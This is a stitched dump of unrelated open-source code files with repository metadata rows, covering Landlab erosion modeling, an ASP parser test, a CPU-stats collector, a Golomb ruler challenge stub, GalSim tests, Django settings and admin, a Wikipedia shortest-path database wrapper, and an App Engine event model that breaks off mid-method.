#make some surface load stresses in a field to test
mg.at_node['surface_load__stress'] = np.zeros(nrows*ncols, dtype=float)
#instantiate:
gf = gFlex(mg, './coupled_SP_gflex_params.txt')
fsp = Fsc(mg, './coupled_SP_gflex_params.txt')
sp = StreamPowerEroder(mg, './coupled_SP_gflex_params.txt')
fr = FlowRouter(mg)
#perform the loop:
elapsed_time = 0. #total time in simulation
while elapsed_time < time_to_run:
print(elapsed_time)
if elapsed_time+dt>time_to_run:
print("Short step!")
dt = time_to_run - elapsed_time
mg = fr.route_flow()
#mg = fsp.erode(mg)
mg,_,_ = sp.erode(mg, dt, node_drainage_areas='drainage_area', slopes_at_nodes='topographic__steepest_slope')
mg.at_node['surface_load__stress'] = (mg.at_node['topographic__elevation']+1000)*rock_stress_param
gf.flex_lithosphere()
    mg.at_node['topographic__elevation'][mg.number_of_nodes//4:3*mg.number_of_nodes//4] += uplift_perstep
elapsed_time += dt
pylab.figure(1)
im = imshow_node_grid(mg, 'topographic__elevation') # display a colored image
pylab.figure(2)
im = imshow_node_grid(mg, 'lithosphere__vertical_displacement')
| mit | 8,369,907,553,255,900,000 | 35.333333 | 113 | 0.725605 | false |
veltri/DLV2 | tests/parser/bug.02.test.py | 1 | 1041 | input = """
colored(2,g) :- not diff_col(2,g).
colored(2,y) :- not diff_col(2,y).
colored(3,g) :- not diff_col(3,g).
colored(3,y) :- not diff_col(3,y).
diff_col(2,g) :- colored(2,y).
diff_col(3,g) :- colored(3,y).
diff_col(2,y) :- colored(2,g).
diff_col(3,y) :- colored(3,g).
no_stable :- colored(2,2), colored(3,2), not no_stable.
no_stable :- colored(2,3), colored(3,3), not no_stable.
no_stable :- colored(2,g), colored(3,g), not no_stable.
no_stable :- colored(2,y), colored(3,y), not no_stable.
"""
output = """
colored(2,g) :- not diff_col(2,g).
colored(2,y) :- not diff_col(2,y).
colored(3,g) :- not diff_col(3,g).
colored(3,y) :- not diff_col(3,y).
diff_col(2,g) :- colored(2,y).
diff_col(3,g) :- colored(3,y).
diff_col(2,y) :- colored(2,g).
diff_col(3,y) :- colored(3,g).
no_stable :- colored(2,2), colored(3,2), not no_stable.
no_stable :- colored(2,3), colored(3,3), not no_stable.
no_stable :- colored(2,g), colored(3,g), not no_stable.
no_stable :- colored(2,y), colored(3,y), not no_stable.
"""
| apache-2.0 | -6,610,001,634,986,753,000 | 30.65625 | 55 | 0.594621 | false |
marrow/monitor.collector | marrow/monitor/collector/ext/cpu.py | 1 | 4403 | # encoding: utf-8
import os
import subprocess
import mongoengine as db
try:
from itertools import izip as zip
except ImportError: # pragma: no cover
pass
class CPUDetail(db.EmbeddedDocument):
user = db.FloatField(db_field='u', verbose_name="Userspace Percentage")
nice = db.FloatField(db_field='n', verbose_name="Low-Priority Percentage")
system = db.FloatField(db_field='s', verbose_name="System Percentage")
iowait = db.FloatField(db_field='io', verbose_name="IO-Blocked Percentage")
irq = db.FloatField(db_field='hi', verbose_name="IRQ Percentage")
soft = db.FloatField(db_field='si', verbose_name="Soft IRQ Percentage")
steal = db.FloatField(db_field='vs', verbose_name="Sibling VM Percentage")
guest = db.FloatField(db_field='vg', verbose_name="Child VM Percentage")
idle = db.FloatField(db_field='i', verbose_name="Idle Percentage")
_fmap = dict(user='%usr', nice='%nice', system='%sys',
iowait='%iowait', irq='%irq', soft='%soft',
steal='%steal', guest='%guest', idle='%idle')
_ifmap = dict(zip(_fmap.values(), _fmap))
def __repr__(self):
fmap = self._fmap
parts = []
for attr in fmap:
value = getattr(self, attr, None)
if value is None: continue
parts.append("%1.2f %s" % (value, fmap[attr]))
return "<CPUDetail %s>" % ', '.join(parts)
class CPUMixIn(object):
# This list will be len(n+1) where n is the number of cores.
# The first value represents the aggregate across all cores.
cpu = db.ListField(db.EmbeddedDocumentField(db.EmbeddedDocument), verbose_name="Processor Information", default=list)
def mpstat_backend():
"""Parse the output of the mpstat program.
Testing on a Linux 2.6.35 Rackspace Cloud server: 1s
"""
# Linux 2.6.35.4-rscloud (tabris.lesite.ca) 01/03/2012 _x86_64_ (4 CPU)
#
# 09:19:08 PM CPU %usr %nice %sys %iowait %irq %soft %steal %guest %idle
# 09:19:09 PM all 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 100.00
# 09:19:09 PM 0 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 100.00
# 09:19:09 PM 1 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 100.00
# 09:19:09 PM 2 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 100.00
# 09:19:09 PM 3 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 100.00
#
# Average: CPU %usr %nice %sys %iowait %irq %soft %steal %guest %idle
# Average: all 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 100.00
# Average: 0 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 100.00
# Average: 1 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 100.00
# Average: 2 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 100.00
# Average: 3 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 100.00
# TODO: Offload IO to the coroutine reactor.
_ifmap = CPUDetail._ifmap
mappings = []
result = subprocess.check_output(['mpstat', '-P', 'ALL', '1', '1'])
for line in result.split('\n'):
if not line.startswith('Average:'):
continue
parts = line.replace(' ', ' ').replace(' ', ' ').split()[2:]
if not mappings:
mappings = [_ifmap.get(i) for i in parts]
continue
detail = dict()
for attr, part in zip(mappings, parts):
if not attr: continue
detail[attr] = float(part) / 100.0
yield CPUDetail(**detail)
_map = {'mpstat': mpstat_backend, None: mpstat_backend}
class CPUExtension(object):
def __init__(self, config):
super(CPUExtension, self).__init__()
# TODO: Standard trifecta.
self.backend = _map[config.get('backend')]
@property
def mixin(self):
        return CPUMixIn
def start(self):
pass
def stop(self):
pass
def __call__(self, rec):
rec.cpu = list()
for chunk in self.backend():
if not isinstance(chunk, db.EmbeddedDocument):
yield chunk
rec.cpu.append(chunk)
| mit | 5,991,399,908,975,429,000 | 34.796748 | 121 | 0.537361 | false |
DayGitH/Python-Challenges | DailyProgrammer/DP20150825C.py | 1 | 3159 | """
[08-21-2015] Challenge #228 [Hard] Golomb Rulers
https://www.reddit.com/r/dailyprogrammer/comments/3hsgr0/08212015_challenge_228_hard_golomb_rulers/
# Description
A typical ruler has many evenly spaced markings. For instance a standard 12” ruler has 13 marks along its edge, each
spaced 1” apart. This is great, and allows the measurement of all (integer) values of length between 1” and 12”.
However, a standard ruler is grossly inefficient. For example, the distance of length 1” can be measured multiple ways
on this ruler: 0 to 1, 1 to 2, 2 to 3, etc.
A mathematician named Solomon W. Golomb had an idea about making rulers more efficient, and rulers of this type are
named after him. A Golomb ruler comprises a series of marks such that no two pairs of marks are the same distance
apart. Below is an example. This ruler has markings that allow all integer distances between 1-6 units to be measured.
Not only that, but each distance can be measured in only one way.
0 1 4 6
+-+-----+----+
You can see how you can measure every integer distance between 1 and 6:
0 1 4 6
+-+-----+----+
1 +-+
2 +----+
3 +-----+
4 +-------+
5 +----------+
6 +------------+
Golomb rulers are described by their **order**, which is the number of marks on their edge. The example above is an
order 4 ruler. The length of a Golomb ruler is the distance between the outer two marks and, obviously, represents the
longest distance it can measure. The above example has a length of 6.
There is no requirement that a Golomb ruler measures all distances up to their length – the only requirement is that
each distance is only measured in one way. However, if a ruler does measure all distances, it is classified as a
*perfect* Golomb ruler. The above example is a perfect Golomb ruler. Finally, a Golomb ruler is described as *optimal*
if no shorter ruler of the same order exists.
Today's challenge is to determine where to place the marks on an optimal (but not necessarily perfect) Golomb ruler
when given its order.
# Input Description
You'll be given a single integer on a line representing the optimal Golomb ruler order. Examples:
3
5
# Output Description
Your program should emit the length of the optimal Golomb ruler and the placement of the marks. Note that some have
multiple solutions, so any or all of the solutions can be yielded. Examples:
3 3 0 1 3
5 11 0 1 4 9 11
0 2 7 8 11
Here you can see that we have two solutions for a Golomb ruler of order five and length 11.
# Challenge Input
8
7
10
20
26
# Challenge Output
Beware the word wrap!
8 34 0 1 4 9 15 22 32 34
7 25 0 1 4 10 18 23 25
0 1 7 11 20 23 25
0 1 11 16 19 23 25
0 2 3 10 16 21 25
0 2 7 13 21 22 25
10 55 0 1 6 10 23 26 34 41 53 55
20 283 0 1 8 11 68 77 94 116 121 156 158 179 194 208 212 228 240 253 259 283
26 492 0 1 33 83 104 110 124 163 185 200 203 249 251 258 314 318 343 356 386 430 440 456 464 475 487 492
"""
def main():
pass
if __name__ == "__main__":
main()
| mit | -260,046,427,798,202,430 | 43.323944 | 118 | 0.686368 | false |
mardom/GalSim | devel/external/test_sersic_highn/test_comparison_basic.py | 1 | 4149 | import sys
import logging
import galsim
"""A simple Python test script to demonstrate use of the galsim.utilities.compare_dft_vs_photon_*
functions.
This script generates a model galaxy and PSF, and then compares the rendering of this object by both
photon shooting and DFT methods, by calling the GSObject `drawShoot()` and `draw()` methods
respectively.
There are two functions that do this in galsim.utilities:
i) galsim.utilities.compare_dft_vs_photon_object
ii) galsim.utilities.compare_dft_vs_photon_config
i) allows the object and optional convolving PSF to be specified directly as GSObject instances.
However, as these are not picklable, these tests can only run in single core mode.
ii) provides multi-core processing functionality, but requires that the object and optional
convolving PSF are specified via a `config` dictionary (see, e.g., examples/demo8.py).
The two methods don't provide identical results, because the `object` version uses only one random
generator sequence to generate all the photons, whereas the `config` version uses a number of
differently seeded random number generators, one for each image. One purpose of this script was
a quick sanity check of their overall consistency, as well as being a demonstration of these testing
utility functions.
"""
# Make the galaxy and PSF objects elliptical Sersic and Moffat, storing all param vals here
# in top level scope
galn = 3.3
galhlr = 0.9
psfbeta = 3.40
psffwhm = 0.85
g1gal = -0.23
g2gal = -0.17
g1psf = +0.03
g2psf = +0.01
# Set a pixel scale (e.g. in arcsec), and image size
dx = 0.27
imsize = 48
# Random seed
rseed = 111333555
# Value of wmult parameter
wmult = 4.
# Value of test tolerance parameters
tol_ellip = 3.e-5
tol_size = 1.e-4
n_photons_test= (int(1e6), int(3.e6), int(1.e7))
def test_comparison_object(np):
logging.basicConfig(level=logging.WARNING, stream=sys.stdout)
logger = logging.getLogger("test_comparison_object")
logger.info("Running basic tests of comparison scripts using objects")
# Build a trial galaxy
gal = galsim.Sersic(galn, half_light_radius=galhlr)
gal.applyShear(g1=g1gal, g2=g2gal)
# And an example PSF
psf = galsim.Moffat(beta=psfbeta, fwhm=psffwhm)
psf.applyShear(g1=g1psf, g2=g2psf)
# Try a single core run
print "Starting tests using config file with N_PHOTONS = "+str(np)
res1 = galsim.utilities.compare_dft_vs_photon_object(
gal, psf_object=psf, rng=galsim.BaseDeviate(rseed), size=imsize, pixel_scale=dx,
abs_tol_ellip=tol_ellip, abs_tol_size=tol_size, n_photons_per_trial=np)
print res1
return
def test_comparison_config(np):
logging.basicConfig(level=logging.WARNING, stream=sys.stdout)
logger = logging.getLogger("test_comparison_config")
logger.info("Running basic tests of comparison scripts using config")
# Set up a config dict to replicate the GSObject spec above
config = {}
config['gal'] = {
"type" : "Sersic",
"n" : galn,
"half_light_radius" : galhlr,
"ellip" : {
"type" : "G1G2",
"g1" : g1gal,
"g2" : g2gal
}
}
config['psf'] = {
"type" : "Moffat",
"beta" : psfbeta,
"fwhm" : psffwhm,
"ellip" : {
"type" : "G1G2",
"g1" : g1psf,
"g2" : g2psf
}
}
config['image'] = {
'size' : imsize,
'pixel_scale' : dx,
'random_seed' : rseed,
'wmult' : wmult
}
# Use an automatically-determined N core run setting
print "Starting tests using config file with N_PHOTONS = "+str(np)
res8 = galsim.utilities.compare_dft_vs_photon_config(
config, n_photons_per_trial=np, nproc=-1, logger=logger, abs_tol_ellip=tol_ellip,
abs_tol_size=tol_size)
print res8
return
if __name__ == "__main__":
for n_photons in n_photons_test:
# First run the config version, then the (slower, single core) object version: see docstring
# in module header for more info.
test_comparison_config(n_photons)
test_comparison_object(n_photons)
| gpl-3.0 | 5,994,837,120,358,078,000 | 29.284672 | 100 | 0.673415 | false |
narusemotoki/awikie | awikie/settings.py | 1 | 1182 | # -*- coding: utf-8 -*-
# awikie -- This is Wiki engine working in Google App Engine.
# Copyright (C) <2013> Motoki Naruse <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
)
INSTALLED_APPS = (
    'awikie',
)
ROOT_URLCONF = 'awikie.urls'
import os
ROOT_PATH = os.path.dirname(__file__)
TEMPLATE_DIRS = (
ROOT_PATH + '/templates',
)
CACHE_BACKEND = 'memcached:///'
import sys
sys.path.append(ROOT_PATH + '/lib')
AUTHORIZED_USER = (
)
| agpl-3.0 | -7,708,945,888,221,004,000 | 26.488372 | 77 | 0.696277 | false |
jwngr/sdow | sdow/database.py | 1 | 9203 | """
Wrapper for reading from and writing to the SDOW database.
"""
import os.path
import sqlite3
import helpers as helpers
from breadth_first_search import breadth_first_search
class Database(object):
"""Wrapper for connecting to the SDOW database."""
def __init__(self, sdow_database, searches_database):
if not os.path.isfile(sdow_database):
raise IOError('Specified SQLite file "{0}" does not exist.'.format(sdow_database))
if not os.path.isfile(searches_database):
raise IOError('Specified SQLite file "{0}" does not exist.'.format(searches_database))
self.sdow_conn = sqlite3.connect(sdow_database, check_same_thread=False)
self.searches_conn = sqlite3.connect(searches_database, check_same_thread=False)
self.sdow_cursor = self.sdow_conn.cursor()
self.searches_cursor = self.searches_conn.cursor()
self.sdow_cursor.arraysize = 1000
self.searches_cursor.arraysize = 1000
def fetch_page(self, page_title):
"""Returns the ID and title of the non-redirect page corresponding to the provided title,
handling titles with incorrect capitalization as well as redirects.
Args:
page_title: The title of the page to fetch.
Returns:
(int, str, bool): A tuple containing the page ID, title, and whether or not a redirect was
followed.
OR
None: If no page exists.
Raises:
ValueError: If the provided page title is invalid.
"""
sanitized_page_title = helpers.get_sanitized_page_title(page_title)
query = 'SELECT * FROM pages WHERE title = ? COLLATE NOCASE;'
query_bindings = (sanitized_page_title,)
self.sdow_cursor.execute(query, query_bindings)
# Because the above query is case-insensitive (due to the COLLATE NOCASE), multiple articles
# can be matched.
results = self.sdow_cursor.fetchall()
if not results:
raise ValueError(
'Invalid page title {0} provided. Page title does not exist.'.format(page_title))
# First, look for a non-redirect page which has exact match with the page title.
for current_page_id, current_page_title, current_page_is_redirect in results:
if current_page_title == sanitized_page_title and not current_page_is_redirect:
return (current_page_id, helpers.get_readable_page_title(current_page_title), False)
# Next, look for a match with a non-redirect page.
for current_page_id, current_page_title, current_page_is_redirect in results:
if not current_page_is_redirect:
return (current_page_id, helpers.get_readable_page_title(current_page_title), False)
# If all the results are redirects, use the page to which the first result redirects.
query = 'SELECT target_id, title FROM redirects INNER JOIN pages ON pages.id = target_id WHERE source_id = ?;'
query_bindings = (results[0][0],)
self.sdow_cursor.execute(query, query_bindings)
result = self.sdow_cursor.fetchone()
# TODO: This will no longer be required once the April 2018 database dump occurs since this
# scenario is prevented by the prune_pages_file.py Python script during the database creation.
if not result:
raise ValueError(
'Invalid page title {0} provided. Page title does not exist.'.format(page_title))
return (result[0], helpers.get_readable_page_title(result[1]), True)
def fetch_page_title(self, page_id):
"""Returns the page title corresponding to the provided page ID.
Args:
page_id: The page ID whose ID to fetch.
Returns:
str: The page title corresponding to the provided page ID.
Raises:
ValueError: If the provided page ID is invalid or does not exist.
"""
helpers.validate_page_id(page_id)
query = 'SELECT title FROM pages WHERE id = ?;'
query_bindings = (page_id,)
self.sdow_cursor.execute(query, query_bindings)
page_title = self.sdow_cursor.fetchone()
if not page_title:
raise ValueError(
'Invalid page ID "{0}" provided. Page ID does not exist.'.format(page_id))
return page_title[0].encode('utf-8').replace('_', ' ')
def compute_shortest_paths(self, source_page_id, target_page_id):
"""Returns a list of page IDs indicating the shortest path between the source and target pages.
Note: the provided page IDs must correspond to non-redirect pages, but that check is not made
for performance reasons.
Args:
source_page_id: The ID corresponding to the page at which to start the search.
target_page_id: The ID corresponding to the page at which to end the search.
Returns:
list(list(int)): A list of integer lists corresponding to the page IDs indicating the shortest path
between the source and target page IDs.
Raises:
ValueError: If either of the provided page IDs are invalid.
"""
helpers.validate_page_id(source_page_id)
helpers.validate_page_id(target_page_id)
return breadth_first_search(source_page_id, target_page_id, self)
def fetch_outgoing_links_count(self, page_ids):
"""Returns the sum of outgoing links of the provided page IDs.
Args:
page_ids: A list of page IDs whose outgoing links to count.
Returns:
int: The count of outgoing links.
"""
return self.fetch_links_count_helper(page_ids, 'outgoing_links_count')
def fetch_incoming_links_count(self, page_ids):
"""Returns the sum of incoming links for the provided page IDs.
Args:
page_ids: A list of page IDs whose incoming links to count.
Returns:
int: The count of incoming links.
"""
return self.fetch_links_count_helper(page_ids, 'incoming_links_count')
def fetch_links_count_helper(self, page_ids, incoming_or_outgoing_links_count):
"""Returns the sum of outgoing or incoming links for the provided page IDs.
Args:
page_ids: A list of page IDs whose outgoing or incoming links to count.
Returns:
int: The count of outgoing or incoming links.
"""
page_ids = str(tuple(page_ids)).replace(',)', ')')
# There is no need to escape the query parameters here since they are never user-defined.
query = 'SELECT SUM({0}) FROM links WHERE id IN {1};'.format(
incoming_or_outgoing_links_count, page_ids)
self.sdow_cursor.execute(query)
return self.sdow_cursor.fetchone()[0]
def fetch_outgoing_links(self, page_ids):
"""Returns a list of tuples of page IDs representing outgoing links from the list of provided
page IDs to other pages.
Args:
page_ids: A list of page IDs whose outgoing links to fetch.
Returns:
list(int, int): A lists of integer tuples representing outgoing links from the list of
provided page IDs to other pages.
"""
return self.fetch_links_helper(page_ids, 'outgoing_links')
def fetch_incoming_links(self, page_ids):
"""Returns a list of tuples of page IDs representing incoming links from the list of provided
page IDs to other pages.
Args:
page_ids: A list of page IDs whose incoming links to fetch.
Returns:
list(int, int): A lists of integer tuples representing incoming links from the list of
provided page IDs to other pages.
"""
return self.fetch_links_helper(page_ids, 'incoming_links')
def fetch_links_helper(self, page_ids, outcoming_or_incoming_links):
"""Helper function which handles duplicate logic for fetch_outgoing_links() and
fetch_incoming_links().
Args:
page_ids: A list of page IDs whose links to fetch.
outcoming_or_incoming_links: String which indicates whether to fetch outgoing ("source_id") or
incoming ("target_id") links.
Returns:
list(int, int): A cursor of a lists of integer tuples representing links from the list of
provided page IDs to other pages.
"""
# Convert the page IDs into a string surrounded by parentheses for insertion into the query
# below. The replace() bit is some hackery to handle Python printing a trailing ',' when there
# is only one key.
page_ids = str(tuple(page_ids)).replace(',)', ')')
# There is no need to escape the query parameters here since they are never user-defined.
query = 'SELECT id, {0} FROM links WHERE id IN {1};'.format(
outcoming_or_incoming_links, page_ids)
self.sdow_cursor.execute(query)
return self.sdow_cursor
def insert_result(self, search):
"""Inserts a new search result into the searches table.
Args:
results: A dictionary containing search information.
Returns:
None
"""
paths_count = len(search['paths'])
if paths_count == 0:
degrees_count = 'NULL'
else:
degrees_count = len(search['paths'][0]) - 1
# There is no need to escape the query parameters here since they are never user-defined.
query = 'INSERT INTO searches VALUES ({source_id}, {target_id}, {duration}, {degrees_count}, {paths_count}, CURRENT_TIMESTAMP);'.format(
source_id=search['source_id'],
target_id=search['target_id'],
duration=search['duration'],
degrees_count=degrees_count,
paths_count=paths_count,
)
self.searches_conn.execute(query)
self.searches_conn.commit()
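# Hypothetical usage sketch (not part of the original module); the file names
# below are placeholders rather than the project's real database paths:
#
#   db = Database('sdow.sqlite', 'searches.sqlite')
#   source_id, source_title, _ = db.fetch_page('Python (programming language)')
#   target_id, target_title, _ = db.fetch_page('Philosophy')
#   paths = db.compute_shortest_paths(source_id, target_id)
#   # `paths` holds lists of page IDs; map them back with fetch_page_title().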
| mit | -4,171,180,308,575,806,500 | 35.959839 | 140 | 0.688362 | false |
szendrei/django-unleashed | suorganizer/blog/migrations/0001_initial.py | 1 | 1238 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-01-21 02:10
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('organizer', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=63)),
('slug', models.SlugField(help_text='A label for URL config.', max_length=63, unique_for_month='pub_date')),
('text', models.TextField()),
('pub_date', models.DateField(auto_now_add=True, verbose_name='date published')),
('startups', models.ManyToManyField(related_name='blog_posts', to='organizer.Startup')),
('tags', models.ManyToManyField(related_name='blog_posts', to='organizer.Tag')),
],
options={
'ordering': ['-pub_date', 'title'],
'verbose_name': 'blog post',
'get_latest_by': 'pub_date',
},
),
]
| gpl-3.0 | 2,204,611,866,440,416,000 | 35.411765 | 124 | 0.550081 | false |
jialij-pdx/bpe_capstone | dashboard/admin.py | 1 | 2171 | # Bonneville Power Adminstration Front-End
# Copyright (C) 2015 Garrison Jenson, Matei Mitaru
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, US$
#
from django.contrib import admin
from dashboard.models import Dashboard
from query.models import Query
class DashboardAdmin(admin.ModelAdmin):
exclude = ('owner',)
def save_model(self, request, obj, form, change):
if not change:
obj.owner = request.user
obj.save()
def has_change_permission(self, request, obj=None):
has_class_permission = \
super(DashboardAdmin, self).has_change_permission(request, obj)
if not has_class_permission:
return False
if obj is not None and not request.user.is_superuser \
and request.user.id != obj.author.id:
return False
return True
class QueryAdmin(admin.ModelAdmin):
exclude = ('owner',)
def save_model(self, request, obj, form, change):
if not change:
obj.owner = request.user
obj.save()
def has_change_permission(self, request, obj=None):
has_class_permission = \
super(QueryAdmin, self).has_change_permission(request, obj)
if not has_class_permission:
return False
if obj is not None and not request.user.is_superuser \
and request.user.id != obj.author.id:
return False
return True
admin.site.register(Dashboard, DashboardAdmin)
admin.site.register(Query, QueryAdmin)
| gpl-2.0 | 2,076,370,343,440,777,000 | 32.921875 | 80 | 0.67941 | false |
synth3tk/the-blue-alliance | models/event.py | 1 | 11392 | from google.appengine.ext import ndb
import datetime
import json
import pytz
import re
from consts.district_type import DistrictType
from consts.event_type import EventType
class Event(ndb.Model):
"""
Events represent FIRST Robotics Competition events, both official and unofficial.
key_name is like '2010ct'
"""
name = ndb.StringProperty()
event_type_enum = ndb.IntegerProperty(required=True)
short_name = ndb.StringProperty(indexed=False) # Should not contain "Regional" or "Division", like "Hartford"
event_short = ndb.StringProperty(required=True, indexed=False) # Smaller abbreviation like "CT"
year = ndb.IntegerProperty(required=True)
event_district_enum = ndb.IntegerProperty()
start_date = ndb.DateTimeProperty()
end_date = ndb.DateTimeProperty()
venue = ndb.StringProperty(indexed=False) # Name of the event venue
venue_address = ndb.StringProperty(indexed=False) # Most detailed venue address (includes venue, street, and location separated by \n)
location = ndb.StringProperty(indexed=False) # in the format "locality, region, country". similar to Team.address
timezone_id = ndb.StringProperty() # such as 'America/Los_Angeles' or 'Asia/Jerusalem'
official = ndb.BooleanProperty(default=False) # Is the event FIRST-official?
first_eid = ndb.StringProperty() # from USFIRST
facebook_eid = ndb.StringProperty(indexed=False) # from Facebook
custom_hashtag = ndb.StringProperty(indexed=False) #Custom HashTag
website = ndb.StringProperty(indexed=False)
webcast_json = ndb.TextProperty(indexed=False) # list of dicts, valid keys include 'type' and 'channel'
matchstats_json = ndb.TextProperty(indexed=False) # for OPR, DPR, CCWM, etc.
rankings_json = ndb.TextProperty(indexed=False)
alliance_selections_json = ndb.TextProperty(indexed=False) # Formatted as: [{'picks': [captain, pick1, pick2, 'frc123', ...], 'declines':[decline1, decline2, ...] }, {'picks': [], 'declines': []}, ... ]
district_points_json = ndb.TextProperty(indexed=False)
created = ndb.DateTimeProperty(auto_now_add=True, indexed=False)
updated = ndb.DateTimeProperty(auto_now=True, indexed=False)
def __init__(self, *args, **kw):
# store set of affected references referenced keys for cache clearing
# keys must be model properties
self._affected_references = {
'key': set(),
'year': set(),
'event_district_abbrev': set(),
'event_district_key': set()
}
self._alliance_selections = None
self._awards = None
self._district_points = None
self._matches = None
self._matchstats = None
self._rankings = None
self._teams = None
self._venue_address_safe = None
self._webcast = None
self._updated_attrs = [] # Used in EventManipulator to track what changed
super(Event, self).__init__(*args, **kw)
@ndb.tasklet
def get_awards_async(self):
from database import award_query
self._awards = yield award_query.EventAwardsQuery(self.key_name).fetch_async()
@property
def alliance_selections(self):
"""
Lazy load alliance_selections JSON
"""
if self._alliance_selections is None:
try:
self._alliance_selections = json.loads(self.alliance_selections_json)
except Exception, e:
self._alliance_selections = None
return self._alliance_selections
@property
def alliance_teams(self):
"""
Load a list of team keys playing in elims
"""
alliances = self.alliance_selections
if alliances is None:
return []
teams = []
for alliance in alliances:
for pick in alliance['picks']:
teams.append(pick)
return teams
@property
def awards(self):
if self._awards is None:
self.get_awards_async().wait()
return self._awards
@property
def district_points(self):
"""
Lazy load district_points JSON
"""
if self._district_points is None:
try:
self._district_points = json.loads(self.district_points_json)
except Exception, e:
self._district_points = None
return self._district_points
@ndb.tasklet
def get_matches_async(self):
from database import match_query
self._matches = yield match_query.EventMatchesQuery(self.key_name).fetch_async()
@property
def matches(self):
if self._matches is None:
            self.get_matches_async().wait()
return self._matches
def local_time(self):
now = datetime.datetime.now()
if self.timezone_id is not None:
tz = pytz.timezone(self.timezone_id)
try:
now = now + tz.utcoffset(now)
except pytz.NonExistentTimeError: # may happen during DST
                now = now + tz.utcoffset(now + datetime.timedelta(hours=1))  # add offset to get out of non-existent time
return now
def withinDays(self, negative_days_before, days_after):
if not self.start_date or not self.end_date:
return False
now = self.local_time()
after_start = self.start_date.date() + datetime.timedelta(days=negative_days_before) <= now.date()
before_end = self.end_date.date() + datetime.timedelta(days=days_after) >= now.date()
return (after_start and before_end)
@property
def now(self):
if self.timezone_id is not None:
return self.withinDays(0, 0)
else:
return self.within_a_day # overestimate what is "now" if no timezone
@property
def within_a_day(self):
return self.withinDays(-1, 1)
@property
def past(self):
return self.end_date.date() < datetime.date.today() and not self.within_a_day
@property
def future(self):
return self.start_date.date() > datetime.date.today() and not self.within_a_day
@property
def starts_today(self):
return self.start_date.date() == self.local_time().date()
@property
def ends_today(self):
return self.end_date.date() == self.local_time().date()
@ndb.tasklet
def get_teams_async(self):
from database import team_query
self._teams = yield team_query.EventTeamsQuery(self.key_name).fetch_async()
@property
def teams(self):
if self._teams is None:
self.get_teams_async().wait()
return self._teams
@ndb.toplevel
def prepAwardsMatchesTeams(self):
yield self.get_awards_async(), self.get_matches_async(), self.get_teams_async()
@ndb.toplevel
def prepTeams(self):
yield self.get_teams_async()
@ndb.toplevel
def prepTeamsMatches(self):
yield self.get_matches_async(), self.get_teams_async()
@property
def matchstats(self):
"""
Lazy load parsing matchstats JSON
"""
if self._matchstats is None:
try:
self._matchstats = json.loads(self.matchstats_json)
except Exception, e:
self._matchstats = None
return self._matchstats
@property
def rankings(self):
"""
Lazy load parsing rankings JSON
"""
if self._rankings is None:
try:
self._rankings = [[str(el) for el in row] for row in json.loads(self.rankings_json)]
except Exception, e:
self._rankings = None
return self._rankings
@property
def venue_or_venue_from_address(self):
if self.venue:
return self.venue
else:
try:
return self.venue_address.split('\r\n')[0]
except:
return None
@property
def venue_address_safe(self):
"""
Construct (not detailed) venue address if detailed venue address doesn't exist
"""
if not self.venue_address:
if not self.venue or not self.location:
self._venue_address_safe = None
else:
self._venue_address_safe = "{}\n{}".format(self.venue.encode('utf-8'), self.location.encode('utf-8'))
else:
self._venue_address_safe = self.venue_address.replace('\r\n', '\n')
return self._venue_address_safe
@property
def webcast(self):
"""
Lazy load parsing webcast JSON
"""
if self._webcast is None:
try:
self._webcast = json.loads(self.webcast_json)
except Exception, e:
self._webcast = None
return self._webcast
@property
def key_name(self):
"""
Returns the string of the key_name of the Event object before writing it.
"""
return str(self.year) + self.event_short
@property
def facebook_event_url(self):
"""
Return a string of the Facebook Event URL.
"""
return "http://www.facebook.com/event.php?eid=%s" % self.facebook_eid
@property
def details_url(self):
"""
Returns the URL pattern for the link to this Event on TBA
"""
return "/event/%s" % self.key_name
@property
def gameday_url(self):
"""
Returns the URL pattern for the link to watch webcasts in Gameday
"""
if self.webcast:
gameday_link = '/gameday'
view_num = 0
for webcast in self.webcast:
if view_num == 0:
gameday_link += '#'
else:
gameday_link += '&'
if 'type' in webcast and 'channel' in webcast:
gameday_link += 'view_' + str(view_num) + '=' + self.key_name + '-' + str(view_num + 1)
view_num += 1
return gameday_link
else:
return None
@property
def hashtag(self):
"""
Return the hashtag used for the event.
"""
if self.custom_hashtag:
return self.custom_hashtag
else:
return "frc" + self.event_short
# Depreciated, still here to keep GAE clean.
webcast_url = ndb.StringProperty(indexed=False)
@classmethod
def validate_key_name(self, event_key):
key_name_regex = re.compile(r'^[1-9]\d{3}[a-z]+[0-9]?$')
match = re.match(key_name_regex, event_key)
return True if match else False
@property
def event_district_str(self):
return DistrictType.type_names.get(self.event_district_enum, None)
@property
def event_district_abbrev(self):
